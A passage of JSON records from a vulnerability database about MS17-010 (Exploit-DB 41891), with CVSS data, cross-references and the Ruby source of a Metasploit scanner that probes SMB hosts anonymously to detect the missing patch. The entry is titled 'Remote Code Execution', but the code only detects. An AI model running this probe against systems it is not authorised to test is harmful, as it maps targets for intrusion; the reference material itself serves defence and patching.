"68b329da9893e34099c7d8ad5cb9c940"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "501b99596c4a2791b470cf17dc7209c2"}, {"key": "published", "hash": "501b99596c4a2791b470cf17dc7209c2"}, {"key": "references", "hash": 
"d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "a74ddd3940ba1da67e7250cb861f505d"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}], "exploitdb": [{"id": "EDB-ID:41891", "hash": "124b185062eb16f7ee569eb946c4e2fb5aa0b1d2cff47a39932d9aff1f4fe4b2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit)", "description": "Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,...", "published": "2017-04-17T00:00:00", "modified": "2017-04-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.exploit-db.com/exploits/41891/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2017-04-18T17:18:01", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Microsoft Windows - Uncredentialed SMB RCE (MS17-010) (Metasploit). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148. 
Dos ...", "enchantments": {}, "hash": "94d82bf5ff171f8185f38e4d5f177d8a65c4cd34b9ae01cb73ec2175b102c55d", "history": [], "href": "https://www.exploit-db.com/exploits/41891/", "id": "EDB-ID:41891", "lastseen": "2017-04-17T19:17:58", "modified": "2017-04-17T00:00:00", "objectVersion": "1.4", "osvdbidlist": [], "published": "2017-04-17T00:00:00", "references": [], "reporter": "Exploit-DB", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# auxiliary/scanner/smb/smb_ms_17_010\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 SMB RCE Detection',\r\n 'Description' => %q{\r\n Uses information disclosure to determine if MS17-010 has been patched or not.\r\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\r\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\r\n not have the MS17-010 patch.\r\n\r\n This module does not require valid SMB credentials in default server\r\n configurations. 
It can log on as the user \"\\\" and connect to IPC$.\r\n },\r\n 'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-0143'],\r\n [ 'CVE', '2017-0144'],\r\n [ 'CVE', '2017-0145'],\r\n [ 'CVE', '2017-0146'],\r\n [ 'CVE', '2017-0147'],\r\n [ 'CVE', '2017-0148'],\r\n [ 'MSB', 'MS17-010'],\r\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\r\n ],\r\n 'License' => MSF_LICENSE\r\n ))\r\n end\r\n\r\n def run_host(ip)\r\n begin\r\n status = do_smb_probe(ip)\r\n\r\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\r\n print_warning(\"Host is likely VULNERABLE to MS17-010!\")\r\n report_vuln(\r\n host: ip,\r\n name: self.name,\r\n refs: self.references,\r\n info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$'\r\n )\r\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\r\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\r\n print_good(\"Host does NOT appear vulnerable.\")\r\n else\r\n print_bad(\"Unable to properly detect if host is vulnerable.\")\r\n end\r\n\r\n rescue ::Interrupt\r\n print_status(\"Exiting on interrupt.\")\r\n raise $!\r\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\r\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\r\n rescue ::Exception => e\r\n vprint_error(\"#{e.class}: #{e.message}\")\r\n ensure\r\n disconnect\r\n end\r\n end\r\n\r\n def do_smb_probe(ip)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\r\n simple.connect(ipc_share)\r\n tree_id = simple.shares[ipc_share]\r\n\r\n print_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\r\n\r\n # request transaction with fid = 0\r\n pkt = make_smb_trans_ms17_010(tree_id)\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n # convert packet to response 
struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n # convert error code to string\r\n code = pkt['SMB'].v['ErrorClass']\r\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\r\n status = smberr.get_error(code)\r\n\r\n print_status(\"Received #{status} with FID = 0\")\r\n status\r\n end\r\n\r\n def make_smb_trans_ms17_010(tree_id)\r\n # make a raw transaction packet\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n # opcode 0x23 = PeekNamedPipe, fid = 0\r\n setup = \"\\x23\\x00\\x00\\x00\"\r\n setup_count = 2 # 2 words\r\n trans = \"\\\\PIPE\\\\\\x00\"\r\n\r\n # calculate offsets to the SetupData payload\r\n base_offset = pkt.to_s.length + (setup.length) - 4\r\n param_offset = base_offset + trans.length\r\n data_offset = param_offset # + 0\r\n\r\n # packet baselines\r\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\r\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload'].v['ParamCountMax'] = 0xffff\r\n pkt['Payload'].v['DataCountMax'] = 0xffff\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n\r\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup\r\n pkt['Payload'].v['Payload'] = trans\r\n\r\n pkt.to_s\r\n end\r\nend\r\n", "sourceHref": "https://www.exploit-db.com/download/41891/", "title": "Microsoft Windows - Uncredentialed SMB RCE (MS17-010) (Metasploit)", "type": "exploitdb", "viewCount": 63}, "differentElements": ["description", "title"], "edition": 1, "lastseen": "2017-04-17T19:17:58"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", 
"CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,...", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-04-18T17:18:01", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", 
"CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", 
"OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-04-18T17:18:01", "rev": 2, "value": 7.9, "vector": "NONE"}}, "hash": "1491f9bbdcecfd0681eee2f7d6d662f9dd08f7fcc4d15286fbaa3dc1ef9f0d08", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "083a04e7fee2ce4aff868e260be7632a", "key": "title"}, {"hash": "0271fb8c6c010b2aca15217429c7c0eb", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c2121915ced0b840e29b29907ddf10ee", "key": "href"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "c80c514f16b0e9853484027f63256907", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "0271fb8c6c010b2aca15217429c7c0eb", "key": "modified"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}], "history": [], "href": "https://www.exploit-db.com/exploits/41891/", "id": "EDB-ID:41891", "immutableFields": [], "lastseen": "2017-04-18T17:18:01", "modified": "2017-04-17T00:00:00", "objectVersion": "1.5", 
"published": "2017-04-17T00:00:00", "references": [], "reporter": "Exploit-DB", "title": "Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit)", "type": "exploitdb", "viewCount": 1322}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-04-18T17:18:01"}], "viewCount": 1368, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", 
"EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, 
{"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-04-18T17:18:01", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2017-04-18T17:18:01", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/41891/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# auxiliary/scanner/smb/smb_ms_17_010\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 SMB RCE Detection',\r\n 'Description' => %q{\r\n Uses information disclosure to determine if MS17-010 has been patched or not.\r\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\r\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\r\n not have the MS17-010 patch.\r\n\r\n This module does not require valid SMB credentials in default server\r\n configurations. 
It can log on as the user \"\\\" and connect to IPC$.\r\n },\r\n 'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-0143'],\r\n [ 'CVE', '2017-0144'],\r\n [ 'CVE', '2017-0145'],\r\n [ 'CVE', '2017-0146'],\r\n [ 'CVE', '2017-0147'],\r\n [ 'CVE', '2017-0148'],\r\n [ 'MSB', 'MS17-010'],\r\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\r\n ],\r\n 'License' => MSF_LICENSE\r\n ))\r\n end\r\n\r\n def run_host(ip)\r\n begin\r\n status = do_smb_probe(ip)\r\n\r\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\r\n print_warning(\"Host is likely VULNERABLE to MS17-010!\")\r\n report_vuln(\r\n host: ip,\r\n name: self.name,\r\n refs: self.references,\r\n info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$'\r\n )\r\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\r\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\r\n print_good(\"Host does NOT appear vulnerable.\")\r\n else\r\n print_bad(\"Unable to properly detect if host is vulnerable.\")\r\n end\r\n\r\n rescue ::Interrupt\r\n print_status(\"Exiting on interrupt.\")\r\n raise $!\r\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\r\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\r\n rescue ::Exception => e\r\n vprint_error(\"#{e.class}: #{e.message}\")\r\n ensure\r\n disconnect\r\n end\r\n end\r\n\r\n def do_smb_probe(ip)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\r\n simple.connect(ipc_share)\r\n tree_id = simple.shares[ipc_share]\r\n\r\n print_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\r\n\r\n # request transaction with fid = 0\r\n pkt = make_smb_trans_ms17_010(tree_id)\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n # convert packet to response 
struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n # convert error code to string\r\n code = pkt['SMB'].v['ErrorClass']\r\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\r\n status = smberr.get_error(code)\r\n\r\n print_status(\"Received #{status} with FID = 0\")\r\n status\r\n end\r\n\r\n def make_smb_trans_ms17_010(tree_id)\r\n # make a raw transaction packet\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n # opcode 0x23 = PeekNamedPipe, fid = 0\r\n setup = \"\\x23\\x00\\x00\\x00\"\r\n setup_count = 2 # 2 words\r\n trans = \"\\\\PIPE\\\\\\x00\"\r\n\r\n # calculate offsets to the SetupData payload\r\n base_offset = pkt.to_s.length + (setup.length) - 4\r\n param_offset = base_offset + trans.length\r\n data_offset = param_offset # + 0\r\n\r\n # packet baselines\r\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\r\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload'].v['ParamCountMax'] = 0xffff\r\n pkt['Payload'].v['DataCountMax'] = 0xffff\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n\r\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup\r\n pkt['Payload'].v['Payload'] = trans\r\n\r\n pkt.to_s\r\n end\r\nend\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 
9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "c80c514f16b0e9853484027f63256907"}, {"key": "href", "hash": "c2121915ced0b840e29b29907ddf10ee"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "0271fb8c6c010b2aca15217429c7c0eb"}, {"key": "published", "hash": "0271fb8c6c010b2aca15217429c7c0eb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "083a04e7fee2ce4aff868e260be7632a"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "scheme": null}, {"id": "EDB-ID:41987", "hash": "0ed13acbb179cfd93f9a01e513f68cdaaa181dc3f4b7238950f752077469b446", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)", "description": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code 
